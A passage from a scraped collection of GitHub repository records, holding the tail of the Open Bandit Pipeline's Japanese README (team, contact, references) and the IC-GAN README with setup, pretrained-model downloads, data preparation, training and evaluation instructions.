\u30b3\u30fc\u30cd\u30eb\u5927\u5b66)\n- [\u7c9f\u98ef\u539f\u4fca\u4ecb](https://www.linkedin.com/in/shunsukeaihara/) (ZOZO\u7814\u7a76\u6240)\n- \u677e\u8c37\u6075 (ZOZO\u7814\u7a76\u6240)\n- [\u6210\u7530\u60a0\u8f14](https://www.yusuke-narita.com/) (\u534a\u719f\u4eee\u60f3\u682a\u5f0f\u4f1a\u793e / \u30a4\u30a7\u30fc\u30eb\u5927\u5b66)\n\n## \u958b\u767a\u30e1\u30f3\u30d0\u30fc\n- [\u91ce\u6751\u5c06\u5bdb](https://twitter.com/nomuramasahir0) (\u682a\u5f0f\u4f1a\u793e\u30b5\u30a4\u30d0\u30fc\u30a8\u30fc\u30b8\u30a7\u30f3\u30c8 / \u534a\u719f\u4eee\u60f3\u682a\u5f0f\u4f1a\u793e)\n- [\u9ad8\u5c71\u6643\u4e00](https://fullflu.hatenablog.com/) (\u534a\u719f\u4eee\u60f3\u682a\u5f0f\u4f1a\u793e)\n- [\u9ed2\u5ca9\u7a1c](https://kurorororo.github.io) (\u30c8\u30ed\u30f3\u30c8\u5927\u5b66 / \u534a\u719f\u4eee\u60f3\u682a\u5f0f\u4f1a\u793e)\n- [\u6e05\u539f\u660e\u52a0](https://sites.google.com/view/harukakiyohara) (\u6771\u4eac\u5de5\u696d\u5927\u5b66 / \u534a\u719f\u4eee\u60f3\u682a\u5f0f\u4f1a\u793e)\n\n# \u9023\u7d61\u5148\n\u8ad6\u6587\u3084Open Bandit Dataset, Open Bandit Pipeline\u306b\u95a2\u3059\u308b\u3054\u8cea\u554f\u306f, \u6b21\u306e\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u5b9b\u306b\u304a\u9858\u3044\u3044\u305f\u3057\u307e\u3059: saito@hanjuku-kaso.com\n\n# \u53c2\u8003\n\n
\n\u8ad6\u6587\n\n1. Alina Beygelzimer and John Langford. [The offset tree for learning with partial labels](https://arxiv.org/abs/0812.4044). In *Proceedings of the 15th ACM SIGKDD International Conference on Knowledge Discovery&Data Mining*, 129\u2013138, 2009.\n\n2. Olivier Chapelle and Lihong Li. [An empirical evaluation of thompson sampling](https://papers.nips.cc/paper/4321-an-empirical-evaluation-of-thompson-sampling). In *Advances in Neural Information Processing Systems*, 2249\u20132257, 2011.\n\n3. Lihong Li, Wei Chu, John Langford, and Xuanhui Wang. [Unbiased Offline Evaluation of Contextual-bandit-based News Article Recommendation Algorithms](https://arxiv.org/abs/1003.5956). In *Proceedings of the Fourth ACM International Conference on Web Search and Data Mining*, 297\u2013306, 2011.\n\n4. Alex Strehl, John Langford, Lihong Li, and Sham M Kakade. [Learning from Logged Implicit Exploration Data](https://arxiv.org/abs/1003.0120). In *Advances in Neural Information Processing Systems*, 2217\u20132225, 2010.\n\n5. Doina Precup, Richard S. Sutton, and Satinder Singh. [Eligibility Traces for Off-Policy Policy Evaluation](https://scholarworks.umass.edu/cgi/viewcontent.cgi?article=1079&context=cs_faculty_pubs). In *Proceedings of the 17th International Conference on Machine Learning*, 759\u2013766. 2000.\n\n6. Miroslav Dud\u00edk, Dumitru Erhan, John Langford, and Lihong Li. [Doubly Robust Policy Evaluation and Optimization](https://arxiv.org/abs/1503.02834). *Statistical Science*, 29:485\u2013511, 2014.\n\n7. Adith Swaminathan and Thorsten Joachims. [The Self-normalized Estimator for Counterfactual Learning](https://papers.nips.cc/paper/5748-the-self-normalized-estimator-for-counterfactual-learning). In *Advances in Neural Information Processing Systems*, 3231\u20133239, 2015.\n\n8. Dhruv Kumar Mahajan, Rajeev Rastogi, Charu Tiwari, and Adway Mitra. [LogUCB: An Explore-Exploit Algorithm for Comments Recommendation](https://dl.acm.org/doi/10.1145/2396761.2396767). In *Proceedings of the 21st ACM international conference on Information and knowledge management*, 6\u201315. 2012.\n\n9. Lihong Li, Wei Chu, John Langford, Taesup Moon, and Xuanhui Wang. [An Unbiased Offline Evaluation of Contextual Bandit Algorithms with Generalized Linear Models](http://proceedings.mlr.press/v26/li12a.html). In *Journal of Machine Learning Research: Workshop and Conference Proceedings*, volume 26, 19\u201336. 2012.\n\n10. Yu-Xiang Wang, Alekh Agarwal, and Miroslav Dudik. [Optimal and Adaptive Off-policy Evaluation in Contextual Bandits](https://arxiv.org/abs/1612.01205). In *Proceedings of the 34th International Conference on Machine Learning*, 3589\u20133597. 2017.\n\n11. Mehrdad Farajtabar, Yinlam Chow, and Mohammad Ghavamzadeh. [More Robust Doubly Robust Off-policy Evaluation](https://arxiv.org/abs/1802.03493). In *Proceedings of the 35th International Conference on Machine Learning*, 1447\u20131456. 2018.\n\n12. Nathan Kallus and Masatoshi Uehara. [Intrinsically Efficient, Stable, and Bounded Off-Policy Evaluation for Reinforcement Learning](https://arxiv.org/abs/1906.03735). In *Advances in Neural Information Processing Systems*. 2019.\n\n13. Yi Su, Lequn Wang, Michele Santacatterina, and Thorsten Joachims. [CAB: Continuous Adaptive Blending Estimator for Policy Evaluation and Learning](https://proceedings.mlr.press/v97/su19a). In *Proceedings of the 36th International Conference on Machine Learning*, 6005-6014, 2019.\n\n14. Yi Su, Maria Dimakopoulou, Akshay Krishnamurthy, and Miroslav Dud\u00edk. [Doubly Robust Off-policy Evaluation with Shrinkage](https://proceedings.mlr.press/v119/su20a.html). In *Proceedings of the 37th International Conference on Machine Learning*, 9167-9176, 2020.\n\n15. Nathan Kallus and Angela Zhou. [Policy Evaluation and Optimization with Continuous Treatments](https://arxiv.org/abs/1802.06037). In *International Conference on Artificial Intelligence and Statistics*, 1243\u20131251. PMLR, 2018.\n\n16. Aman Agarwal, Soumya Basu, Tobias Schnabel, and Thorsten Joachims. [Effective Evaluation using Logged Bandit Feedback from Multiple Loggers](https://arxiv.org/abs/1703.06180). In *Proceedings of the 23rd ACM SIGKDD international conference on Knowledge discovery and data mining*, 687\u2013696, 2017.\n\n17. Nathan Kallus, Yuta Saito, and Masatoshi Uehara. [Optimal Off-Policy Evaluation from Multiple Logging Policies](http://proceedings.mlr.press/v139/kallus21a.html). In *Proceedings of the 38th International Conference on Machine Learning*, 5247-5256, 2021.\n\n18. Shuai Li, Yasin Abbasi-Yadkori, Branislav Kveton, S Muthukrishnan, Vishwa Vinay, and Zheng Wen. [Offline Evaluation of Ranking Policies with Click Models](https://arxiv.org/pdf/1804.10488). In *Proceedings of the 24th ACM SIGKDD International Conference on Knowledge Discovery&Data Mining*, 1685\u20131694, 2018.\n\n19. James McInerney, Brian Brost, Praveen Chandar, Rishabh Mehrotra, and Benjamin Carterette. [Counterfactual Evaluation of Slate Recommendations with Sequential Reward Interactions](https://arxiv.org/abs/2007.12986). In *Proceedings of the 26th ACM SIGKDD International Conference on Knowledge Discovery&Data Mining*, 1779\u20131788, 2020.\n\n20. Yusuke Narita, Shota Yasui, and Kohei Yata. [Debiased Off-Policy Evaluation for Recommendation Systems](https://dl.acm.org/doi/10.1145/3460231.3474231). In *Proceedings of the Fifteenth ACM Conference on Recommender Systems*, 372-379, 2021.\n\n21. Weihua Hu, Matthias Fey, Marinka Zitnik, Yuxiao Dong, Hongyu Ren, Bowen Liu, Michele Catasta, and Jure Leskovec. [Open Graph Benchmark: Datasets for Machine Learning on Graphs](https://arxiv.org/abs/2005.00687). In *Advances in Neural Information Processing Systems*. 2020.\n\n22. Noveen Sachdeva, Yi Su, and Thorsten Joachims. [Off-policy Bandits with Deficient Support](https://dl.acm.org/doi/10.1145/3394486.3403139). In *Proceedings of the 26th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining*, 965-975, 2021.\n\n23. Yi Su, Pavithra Srinath, and Akshay Krishnamurthy. [Adaptive Estimator Selection for Off-Policy Evaluation](https://proceedings.mlr.press/v119/su20d.html). In *Proceedings of the 38th International Conference on Machine Learning*, 9196-9205, 2021.\n\n24. Haruka Kiyohara, Yuta Saito, Tatsuya Matsuhiro, Yusuke Narita, Nobuyuki Shimizu, Yasuo Yamamoto. [Doubly Robust Off-Policy Evaluation for Ranking Policies under the Cascade Behavior Model](https://dl.acm.org/doi/10.1145/3488560.3498380). In *Proceedings of the Fifteenth ACM International Conference on Web Search and Data Mining*, 487-497, 2022.\n\n25. Yuta Saito and Thorsten Joachims. [Off-Policy Evaluation for Large Action Spaces via Embeddings](https://arxiv.org/abs/2202.06317). In *Proceedings of the 39th International Conference on Machine Learning*, 2022.\n\n
\n\n
\n\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\n\u672c\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306f **Open Graph Benchmark** ([[github](https://github.com/snap-stanford/ogb)] [[project page](https://ogb.stanford.edu)] [[paper](https://arxiv.org/abs/2005.00687)]) \u3092\u53c2\u8003\u306b\u3057\u3066\u3044\u307e\u3059.\n
\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "facebookresearch/ic_gan", "link": "https://github.com/facebookresearch/ic_gan", "tags": [], "stars": 514, "description": "Official repository for the paper \"Instance-Conditioned GAN\" by Arantxa Casanova, Marlene Careil, Jakob Verbeek, Micha\u0142 Dro\u017cd\u017cal, Adriana Romero-Soriano.", "lang": "Python", "repo_lang": "", "readme": "#

IC-GAN: Instance-Conditioned GAN

\nOfficial Pytorch code of [Instance-Conditioned GAN](https://arxiv.org/abs/2109.05070) by Arantxa Casanova, Marl\u00e8ne Careil, Jakob Verbeek, Micha\u0142 Dro\u017cd\u017cal, Adriana Romero-Soriano. \n![IC-GAN results](./figures/github_image.png?raw=true)\n\n## Generate images with IC-GAN in a Colab Notebook\nWe provide a [Google Colab notebook](https://colab.research.google.com/github/facebookresearch/ic_gan/blob/main/inference/icgan_colab.ipynb) to generate images with IC-GAN and its class-conditional counter part. We also invite users to check out the [demo on Replicate](https://replicate.ai/arantxacasanova/ic_gan), courtesy of [Replicate](https://replicate.ai/home).\n\nThe figure below depicts two instances, unseen during training and downloaded from [Creative Commons search](https://search.creativecommons.org), and the generated images with IC-GAN and class-conditional IC-GAN when conditioning on the class \"castle\":\n

\n \n

\n\nAdditionally, and inspired by [this Colab](https://colab.research.google.com/github/eyaler/clip_biggan/blob/main/ClipBigGAN.ipynb), we provide the funcionality in the same Colab notebook to guide generations with text captions, using the [CLIP model](https://github.com/openai/CLIP). \nAs an example, the following Figure shows three instance conditionings and a text caption (top), followed by the resulting generated images with IC-GAN (bottom), when optimizing the noise vector following CLIP's gradient for 100 iterations. \n

\n \n

\n\n\n*Credit for the three instance conditionings, from left to right, that were modified with a resize and central crop:* [1: \"Landscape in Bavaria\" by shining.darkness, licensed under CC BY 2.0](https://search.creativecommons.org/photos/92ef279c-4469-49a5-aa4b-48ad746f2dc4), [2: \"Fantasy Landscape - slolsss\" by Douglas Tofoli is marked with CC PDM 1.0](https://search.creativecommons.org/photos/13646adc-f1df-437a-a0dd-8223452ee46c), [3: \"How to Draw Landscapes Simply\" by Kuwagata Keisai is marked with CC0 1.0](https://search.creativecommons.org/photos/2ab9c3b7-de99-4536-81ed-604ee988bd5f)\n\n\n## Requirements\n* Python 3.8 \n* Cuda v10.2 / Cudnn v7.6.5\n* gcc v7.3.0\n* Pytorch 1.8.0\n* A conda environment can be created from `environment.yaml` by entering the command: `conda env create -f environment.yml`, that contains the aforemention version of Pytorch and other required packages. \n* Faiss: follow the instructions in the [original repository](https://github.com/facebookresearch/faiss).\n\n\n## Overview \n\nThis repository consists of four main folders:\n* `data_utils`: A common folder to obtain and format the data needed to train and test IC-GAN, agnostic of the specific backbone. \n* `inference`: Scripts to test the models both qualitatively and quantitatively.\n* `BigGAN_PyTorch`: It provides the training, evaluation and sampling scripts for IC-GAN with a BigGAN backbone. The code base comes from [Pytorch BigGAN repository](https://github.com/ajbrock/BigGAN-PyTorch), made available under the MIT License. It has been modified to [add additional utilities](#biggan-changelog) and it enables IC-GAN training on top of it.\n* `stylegan2_ada_pytorch`: It provides the training, evaluation and sampling scripts for IC-GAN with a StyleGAN2 backbone. The code base comes from [StyleGAN2 Pytorch](https://github.com/NVlabs/stylegan2-ada-pytorch), made available under the [Nvidia Source Code License](https://nvlabs.github.io/stylegan2-ada-pytorch/license.html). It has been modified to [add additional utilities](#stylegan-changelog) and it enables IC-GAN training on top of it.\n\n\n## (Python script) Generate images with IC-GAN\nAlternatively, we can generate images with IC-GAN models directly from a python script, by following the next steps:\n1) Download the desired pretrained models (links below) and the [pre-computed 1000 instance features from ImageNet](https://dl.fbaipublicfiles.com/ic_gan/stored_instances.tar.gz) and extract them into a folder `pretrained_models_path`. \n\n| model | backbone | class-conditional? | training dataset | resolution | url |\n|-------------------|-------------------|-------------------|---------------------|--------------------|--------------------|\n| IC-GAN | BigGAN | No | ImageNet | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_imagenet_res256.tar.gz) | \n| IC-GAN (half capacity) | BigGAN | No | ImageNet | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_imagenet_res256_halfcap.tar.gz) | \n| IC-GAN | BigGAN | No | ImageNet | 128x128 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_imagenet_res128.tar.gz) | \n| IC-GAN | BigGAN | No | ImageNet | 64x64 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_imagenet_res64.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenet_res256.tar.gz) | \n| IC-GAN (half capacity) | BigGAN | Yes | ImageNet | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenet_res256_halfcap.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet | 128x128 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenet_res128.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet | 64x64 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenet_res64.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet-LT | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenetlt_res256.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet-LT | 128x128 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenetlt_res128.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet-LT | 64x64 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenetlt_res64.tar.gz) | \n| IC-GAN | BigGAN | No | COCO-Stuff | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_coco_res256.tar.gz) | \n| IC-GAN | BigGAN | No | COCO-Stuff | 128x128 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_coco_res128.tar.gz) | \n| IC-GAN | StyleGAN2 | No | COCO-Stuff | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_stylegan2_coco_res256.tar.gz) | \n| IC-GAN | StyleGAN2 | No | COCO-Stuff | 128x128 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_stylegan2_coco_res128.tar.gz) | \n\n2) Execute: \n```\npython inference/generate_images.py --root_path [pretrained_models_path] --model [model] --model_backbone [backbone] --resolution [res]\n```\n* `model` can be chosen from `[\"icgan\", \"cc_icgan\"]` to use the IC-GAN or the class-conditional IC-GAN model respectively.\n* `backbone` can be chosen from `[\"biggan\", \"stylegan2\"]`.\n* `res` indicates the resolution at which the model has been trained. For ImageNet, choose one in `[64, 128, 256]`, and for COCO-Stuff, one in `[128, 256]`.\n\nThis script results in a .PNG file where several generated images are shown, given an instance feature (each row), and a sampled noise vector (each grid position).\n \nAdditional and optional parameters:\n* `index`: (None by default), is an integer from 0 to 999 that choses a specific instance feature vector out of the 1000 instances that have been selected with k-means on the ImageNet dataset and stored in `pretrained_models_path/stored_instances`.\n* `swap_target`: (None by default) is an integer from 0 to 999 indicating an ImageNet class label. This label will be used to condition the class-conditional IC-GAN, regardless of which instance features are being used.\n* `which_dataset`: (ImageNet by default) can be chosen from `[\"imagenet\", \"coco\"]` to indicate which dataset (training split) to sample the instances from. \n* `trained_dataset`: (ImageNet by default) can be chosen from `[\"imagenet\", \"coco\"]` to indicate the dataset in which the IC-GAN model has been trained on. \n* `num_imgs_gen`: (5 by default), it changes the number of noise vectors to sample per conditioning. Increasing this number results in a bigger .PNG file to save and load.\n* `num_conditionings_gen`: (5 by default), it changes the number of conditionings to sample. Increasing this number results in a bigger .PNG file to save and load.\n* `z_var`: (1.0 by default) controls the truncation factor for the generation. \n* Optionally, the script can be run with the following additional options `--visualize_instance_images --dataset_path [dataset_path]` to visualize the ground-truth images corresponding to the conditioning instance features, given a path to the dataset's ground-truth images `dataset_path`. Ground-truth instances will be plotted as the leftmost image for each row.\n\n## Data preparation \n
\n
\nImageNet\n
\n
    \n
  1. Download dataset from here .\n
  2. \n
  3. Download SwAV feature extractor weights from here .
  4. \n
  5. Replace the paths in data_utils/prepare_data.sh: out_path by the path where hdf5 files will be stored, path_imnet by the path where ImageNet dataset is downloaded, and path_swav by the path where SwAV weights are stored.
  6. \n
  7. Execute ./data_utils/prepare_data.sh imagenet [resolution], where [resolution] can be an integer in {64,128,256}. This script will create several hdf5 files:\n
    • ILSVRC[resolution]_xy.hdf5 and ILSVRC[resolution]_val_xy.hdf5, where images and labels are stored for the training and validation set respectively.
    • \n
    • ILSVRC[resolution]_feats_[feature_extractor]_resnet50.hdf5 that contains the instance features for each image.
    • \n
    • ILSVRC[resolution]_feats_[feature_extractor]_resnet50_nn_k[k_nn].hdf5 that contains the list of [k_nn] neighbors for each of the instance features.
  8. \n

\n
\n\n
\nImageNet-LT\n
\n
    \n
  1. Download ImageNet dataset from here . Following ImageNet-LT , the file ImageNet_LT_train.txt can be downloaded from this link and later stored in the folder ./BigGAN_PyTorch/imagenet_lt.\n
  2. \n
  3. Download the pre-trained weights of the ResNet on ImageNet-LT from this link, provided by the classifier-balancing repository .
  4. \n
  5. Replace the paths in data_utils/prepare_data.sh: out_path by the path where hdf5 files will be stored, path_imnet by the path where ImageNet dataset is downloaded, and path_classifier_lt by the path where the pre-trained ResNet50 weights are stored.
  6. \n
  7. Execute ./data_utils/prepare_data.sh imagenet_lt [resolution], where [resolution] can be an integer in {64,128,256}. This script will create several hdf5 files:\n
    • ILSVRC[resolution]longtail_xy.hdf5, where images and labels are stored for the training and validation set respectively.
    • \n
    • ILSVRC[resolution]longtail_feats_[feature_extractor]_resnet50.hdf5 that contains the instance features for each image.
    • \n
    • ILSVRC[resolution]longtail_feats_[feature_extractor]_resnet50_nn_k[k_nn].hdf5 that contains the list of [k_nn] neighbors for each of the instance features.
  8. \n

\n
\n\n
\nCOCO-Stuff\n
\n
    \n
  1. Download the dataset following the LostGANs' repository instructions .\n
  2. \n
  3. Download SwAV feature extractor weights from here .
  4. \n
  5. Replace the paths in data_utils/prepare_data.sh: out_path by the path where hdf5 files will be stored, path_imnet by the path where ImageNet dataset is downloaded, and path_swav by the path where SwAV weights are stored.
  6. \n
  7. Execute ./data_utils/prepare_data.sh coco [resolution], where [resolution] can be an integer in {128,256}. This script will create several hdf5 files:\n
    • COCO[resolution]_xy.hdf5 and COCO[resolution]_val_test_xy.hdf5, where images and labels are stored for the training and evaluation set respectively.
    • \n
    • COCO[resolution]_feats_[feature_extractor]_resnet50.hdf5 that contains the instance features for each image.
    • \n
    • COCO[resolution]_feats_[feature_extractor]_resnet50_nn_k[k_nn].hdf5 that contains the list of [k_nn] neighbors for each of the instance features.
  8. \n

\n
\n\n
\nOther datasets\n
\n
    \n
  1. Download the corresponding dataset and store in a folder dataset_path.\n
  2. \n
  3. Download SwAV feature extractor weights from here .
  4. \n
  5. Replace the paths in data_utils/prepare_data.sh: out_path by the path where hdf5 files will be stored and path_swav by the path where SwAV weights are stored.
  6. \n
  7. Execute ./data_utils/prepare_data.sh [dataset_name] [resolution] [dataset_path], where [dataset_name] will be the dataset name, [resolution] can be an integer, for example 128 or 256, and dataset_path contains the dataset images. This script will create several hdf5 files:\n
    • [dataset_name][resolution]_xy.hdf5, where images and labels are stored for the training set.
    • \n
    • [dataset_name][resolution]_feats_[feature_extractor]_resnet50.hdf5 that contains the instance features for each image.
    • \n
    • [dataset_name][resolution]_feats_[feature_extractor]_resnet50_nn_k[k_nn].hdf5 that contains the list of k_nn neighbors for each of the instance features.
  8. \n

\n
\n\n\n
\nHow to subsample an instance feature dataset with k-means\n
\nTo downsample the instance feature vector dataset, after we have prepared the data, we can use the k-means algorithm:\n\npython data_utils/store_kmeans_indexes.py --resolution [resolution] --which_dataset [dataset_name] --data_root [data_path]\n \n
  • Adding --gpu allows the faiss library to compute k-means leveraging GPUs, resulting in faster execution.
  • \n
  • Adding the parameter --feature_extractor [feature_extractor] chooses which feature extractor to use, with feature_extractor in ['selfsupervised', 'classification'] , if we are using swAV as feature extactor or the ResNet pretrained on the classification task on ImageNet, respectively.
  • \n
  • The number of k-means clusters can be set with --kmeans_subsampled [centers], where centers is an integer.
\n
\n
\n
\n\n## How to train the models\n\n#### BigGAN or StyleGAN2 backbone\nTraining parameters are stored in JSON files in `[backbone_folder]/config_files/[dataset]/*.json`, where `[backbone_folder]` is either BigGAN_Pytorch or stylegan2_ada_pytorch and `[dataset]` can either be ImageNet, ImageNet-LT or COCO_Stuff.\n```\ncd BigGAN_PyTorch\npython run.py --json_config config_files//.json --data_root [data_root] --base_root [base_root]\n```\nor \n```\ncd stylegan_ada_pytorch\npython run.py --json_config config_files//.json --data_root [data_root] --base_root [base_root]\n```\nwhere:\n* `data_root` path where the data has been prepared and stored, following the previous section (Data preparation). \n* `base_root` path where to store the model weights and logs.\n\n\nNote that one can create other JSON files to modify the training parameters.\n\n#### Other backbones\nTo be able to run IC-GAN with other backbones, we provide some orientative steps:\n* Place the new backbone code in a new folder under `ic_gan` (`ic_gan/new_backbone`).\n* Modify the relevant piece of code in the GAN architecture to allow instance features as conditionings (for both generator and discriminator). \n* Create a `trainer.py` file with the training loop to train an IC-GAN with the new backbone. The `data_utils` folder provides the tools to prepare the dataset, load the data and conditioning sampling to train an IC-GAN. The IC-GAN with BigGAN backbone [`trainer.py`](BigGAN_PyTorch/trainer.py) file can be used as an inspiration.\n\n\n \n## How to test the models\nTo obtain the FID and IS metrics on ImageNet and ImageNet-LT: \n1) Execute:\n``` \npython inference/test.py --json_config [BigGAN-PyTorch or stylegan-ada-pytorch]/config_files//.json --num_inception_images [num_imgs] --sample_num_npz [num_imgs] --eval_reference_set [ref_set] --sample_npz --base_root [base_root] --data_root [data_root] --kmeans_subsampled [kmeans_centers] --model_backbone [backbone]\n```\nTo obtain the tensorflow IS and FID metrics, use an environment with the Python <3.7 and Tensorflow 1.15. Then:\n\n2) Obtain Inception Scores and pre-computed FID moments:\n ``` \n python ../data_utils/inception_tf13.py --experiment_name [exp_name] --experiment_root [base_root] --kmeans_subsampled [kmeans_centers] \n ```\n\nFor stratified FIDs in the ImageNet-LT dataset, the following parameters can be added `--which_dataset 'imagenet_lt' --split 'val' --strat_name [stratified_split]`, where `stratified_split` can be in `[few,low, many]`.\n \n3) (Only needed once) Pre-compute reference moments with tensorflow code:\n ```\n python ../data_utils/inception_tf13.py --use_ground_truth_data --data_root [data_root] --split [ref_set] --resolution [res] --which_dataset [dataset]\n ```\n\n4) (Using this [repository](https://github.com/bioinf-jku/TTUR)) FID can be computed using the pre-computed statistics obtained in 2) and the pre-computed ground-truth statistics obtain in 3). For example, to compute the FID with reference ImageNet validation set: \n```python TTUR/fid.py [base_root]/[exp_name]/TF_pool_.npz [data_root]/imagenet_val_res[res]_tf_inception_moments_ground_truth.npz ``` \n\nTo obtain the FID metric on COCO-Stuff:\n1) Obtain ground-truth jpeg images: ```python data_utils/store_coco_jpeg_images.py --resolution [res] --split [ref_set] --data_root [data_root] --out_path [gt_coco_images] --filter_hd [filter_hd] ```\n2) Store generated images as jpeg images: ```python sample.py --json_config ../[BigGAN-PyTorch or stylegan-ada-pytorch]/config_files//.json --data_root [data_root] --base_root [base_root] --sample_num_npz [num_imgs] --which_dataset 'coco' --eval_instance_set [ref_set] --eval_reference_set [ref_set] --filter_hd [filter_hd] --model_backbone [backbone] ```\n3) Using this [repository](https://github.com/bioinf-jku/TTUR), compute FID on the two folders of ground-truth and generated images.\n\nwhere:\n* `dataset`: option to select the dataset in `['imagenet', 'imagenet_lt', 'coco']\n* `exp_name`: name of the experiment folder.\n* `data_root`: path where the data has been prepared and stored, following the previous section [\"Data preparation\"](#data-preparation). \n* `base_root`: path where to find the model (for example, where the pretrained models have been downloaded). \n* `num_imgs`: needs to be set to 50000 for ImageNet and ImageNet-LT (with validation set as reference) and set to 11500 for ImageNet-LT (with training set as reference). For COCO-Stuff, set to 75777, 2050, 675, 1375 if using the training, evaluation, evaluation seen or evaluation unseen set as reference.\n* `ref_set`: set to `'val'` for ImageNet, ImageNet-LT (and COCO) to obtain metrics with the validation (evaluation) set as reference, or set to `'train'` for ImageNet-LT or COCO to obtain metrics with the training set as reference.\n* `kmeans_centers`: set to 1000 for ImageNet and to -1 for ImageNet-LT. \n* `backbone`: model backbone architecture in `['biggan','stylegan2']`.\n* `res`: integer indicating the resolution of the images (64,128,256).\n* `gt_coco_images`: folder to store the ground-truth JPEG images of that specific split.\n* `filter_hd`: only valid for `ref_set=val`. If -1, use the entire evaluation set; if 0, use only conditionings and their ground-truth images with seen class combinations during training (eval seen); if 1, use only conditionings and their ground-truth images with unseen class combinations during training (eval unseen). \n\n\n## Utilities for GAN backbones\nWe change and provide extra utilities to facilitate the training, for both BigGAN and StyleGAN2 base repositories.\n\n### BigGAN change log\nThe following changes were made:\n\n* BigGAN architecture:\n * In `train_fns.py`: option to either have the optimizers inside the generator and discriminator class, or directly in the `G_D` wrapper module. Additionally, added an option to augment both generated and real images with augmentations from [DiffAugment](https://github.com/mit-han-lab/data-efficient-gans).\n * In `BigGAN.py`: added a function `get_condition_embeddings` to handle the conditioning separately.\n * Small modifications to `layers.py` to adapt the batchnorm function calls to the pytorch 1.8 version. \n \n* Training utilities: \n * Added `trainer.py` file (replacing train.py):\n * Training now allows the usage of DDP for faster single-node and multi-node training.\n * Training is performed by epochs instead of by iterations.\n * Option to stop the training by using early stopping or when experiments diverge. \n * In `utils.py`:\n * Replaced `MultiEpochSampler` for `CheckpointedSampler` to allow experiments to be resumable when using epochs and fixing a bug where `MultiEpochSampler` would require a long time to fetch data permutations when the number of epochs increased.\n * ImageNet-LT: Added option to use different class distributions when sampling a class label for the generator.\n * ImageNet-LT: Added class balancing (uniform and temperature annealed).\n * Added data augmentations from [DiffAugment](https://github.com/mit-han-lab/data-efficient-gans).\n\n* Testing utilities:\n * In `calculate_inception_moments.py`: added option to obtain moments for ImageNet-LT dataset, as well as stratified moments for many, medium and few-shot classes (stratified FID computation).\n * In `inception_utils.py`: added option to compute [Precision, Recall, Density, Coverage](https://github.com/clovaai/generative-evaluation-prdc) and stratified FID.\n \n* Data utilities:\n * In `datasets.py`, added option to load ImageNet-LT dataset.\n * Added ImageNet-LT.txt files with image indexes for training and validation split. \n * In `utils.py`: \n * Separate functions to obtain the data from hdf5 files (`get_dataset_hdf5`) or from directory (`get_dataset_images`), as well as a function to obtain only the data loader (`get_dataloader`). \n * Added the function `sample_conditionings` to handle possible different conditionings to train G with.\n \n* Experiment utilities:\n * Added JSON files to launch experiments with the proposed hyper-parameter configuration.\n * Script to launch experiments with either the [submitit tool](https://github.com/facebookincubator/submitit) or locally in the same machine (run.py). \n\n### StyleGAN2 change log \n
\n
    \n
  • Multi-node DistributedDataParallel training.
  • \n
  • Added early stopping based on the training FID metric.
  • \n
  • Automatic checkpointing when jobs are automatically rescheduled on a cluster.
  • \n
  • Option to load dataset from hdf5 file.
  • \n
  • Replaced the usage of Click python package by an `ArgumentParser`.
  • \n
  • Only saving best and last model weights.
  • \n
\n
\n\n## Acknowledgements\nWe would like to thanks the authors of the [Pytorch BigGAN repository](https://github.com/ajbrock/BigGAN-PyTorch) and [StyleGAN2 Pytorch](https://github.com/NVlabs/stylegan2-ada-pytorch), as our model requires their repositories to train IC-GAN with BigGAN or StyleGAN2 bakcbone respectively. \nMoreover, we would like to further thank the authors of [generative-evaluation-prdc](https://github.com/clovaai/generative-evaluation-prdc), [data-efficient-gans](https://github.com/mit-han-lab/data-efficient-gans), [faiss](https://github.com/facebookresearch/faiss) and [sg2im](https://github.com/google/sg2im) as some components were borrowed and modified from their code bases. Finally, we thank the author of [WanderCLIP](https://colab.research.google.com/github/eyaler/clip_biggan/blob/main/WanderCLIP.ipynb) as well as the following repositories, that we use in our Colab notebook: [pytorch-pretrained-BigGAN](https://github.com/huggingface/pytorch-pretrained-BigGAN) and [CLIP](https://github.com/openai/CLIP).\n\n## License\nThe majority of IC-GAN is licensed under CC-BY-NC, however portions of the project are available under separate license terms: BigGAN and [PRDC](https://github.com/facebookresearch/ic_gan/blob/main/data_utils/compute_pdrc.py) are licensed under the MIT license; [COCO-Stuff loader](https://github.com/facebookresearch/ic_gan/blob/main/data_utils/cocostuff_dataset.py) is licensed under Apache License 2.0; [DiffAugment](https://github.com/facebookresearch/ic_gan/blob/main/BigGAN_PyTorch/diffaugment_utils.py) is licensed under BSD 2-Clause Simplified license; StyleGAN2 is licensed under a NVIDIA license, available here: https://github.com/NVlabs/stylegan2-ada-pytorch/blob/main/LICENSE.txt. In the Colab notebook, [CLIP](https://github.com/openai/CLIP) and [pytorch-pretrained-BigGAN](https://github.com/huggingface/pytorch-pretrained-BigGAN) code is used, both licensed under the MIT license.\n\n## Disclaimers\nTHE 